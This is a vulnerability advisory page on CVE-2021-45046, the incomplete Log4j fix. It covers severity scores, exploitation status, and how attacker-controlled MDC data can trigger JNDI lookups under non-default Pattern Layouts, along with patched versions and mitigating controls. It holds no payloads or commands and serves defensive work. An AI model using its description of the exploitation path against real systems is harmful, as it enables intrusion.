Cyber Resilience

CVE-2021-45046

CriticalCISA KEVActive ExploitationEUVD ExploitedRansomware-linkedRCE

Published: 14 December 2021

Published
14 December 2021
Modified
27 October 2025
KEV Added
01 May 2023
Patch
CVSS Score v3.1 9.0 CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Score 0.9998 100.0th percentile
Risk Priority 100 floored blend · peak EPSS

Summary

CVE-2021-45046 is a critical-severity Expression Language Injection (CWE-917) vulnerability in Apache Log4J. Its CVSS base score is 9.0 (Critical).

Operationally, ranked in the top 0.0% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog.

The strongest mitigations our analysis identified are NIST 800-53 CM-7 (Least Functionality) and SI-2 (Flaw Remediation).

Deeper analysis

The vulnerability is an incomplete remediation of CVE-2021-44228 in Apache Log4j 2.15.0 that leaves certain non-default configurations exposed. Specifically, when the logging configuration uses a non-default Pattern Layout containing a Context Lookup (such as $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), an attacker who can supply data to the Thread Context Map (MDC) can embed a JNDI Lookup expression. This affects Log4j versions prior to the subsequent fixes on both Java 8 and Java 7 runtimes.

An attacker with control over MDC input data can therefore supply a crafted string that triggers JNDI resolution. Successful exploitation yields an information leak and remote code execution in some environments, or local code execution in all environments. The attack does not require authentication or user interaction and carries a CVSS 3.1 score of 9.0 under the vector AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H.

Vendor guidance and subsequent patches state that the issue is resolved in Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) by removing support for message lookup patterns entirely and disabling JNDI functionality by default. Public advisories from the oss-security list and Siemens product-cert bulletins reiterate these version upgrades as the primary mitigation.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern…

more

Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

CWE(s)
KEV Date Added
01 May 2023

Related Threats

CVEs Like This One

CVE-2021-44228Same product: Apache Log4Jboth on KEV
CVE-2023-4911Same product: Debian Debian Linuxboth on KEV
CVE-2023-5631Same product: Debian Debian Linuxboth on KEV
CVE-2022-0847Same product: Fedoraproject Fedoraboth on KEV
CVE-2025-24813Same product: Debian Debian Linuxboth on KEV
CVE-2014-0160Same product: Debian Debian Linuxboth on KEV
CVE-2016-5195Same product: Debian Debian Linuxboth on KEV
CVE-2020-1472Same product: Debian Debian Linuxboth on KEV
CVE-2021-3156Same product: Debian Debian Linuxboth on KEV
CVE-2026-24061Same product: Debian Debian Linuxboth on KEV

Affected Assets

apache
log4j
2.0 · 2.0.1 — 2.12.2 · 2.13.0 — 2.16.0
cvat
computer vision annotation tool
all versions
intel
audio development kit
all versions
intel
datacenter manager
all versions
intel
genomics kernel library
all versions
intel
oneapi
all versions
intel
secure device onboard
all versions
intel
sensor solution firmware development kit
all versions
intel
system debugger
all versions
intel
system studio
all versions
+45 more product configuration(s) — see NVD for full list

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly requires timely application of the vendor patches (Log4j 2.16.0 / 2.12.2) that remove message lookup support and disable JNDI by default, eliminating the incomplete CVE-2021-44228 remediation.

prevent

Mandates disabling or removing non-essential features such as JNDI lookups and Context/Map pattern interpolation in Log4j, exactly matching the configuration changes that close this attack vector.

prevent

Requires enforcing secure baseline settings for logging Pattern Layouts so that non-default Context Lookup or %X/%mdc patterns are never active, preventing attacker-controlled MDC data from triggering JNDI resolution.

References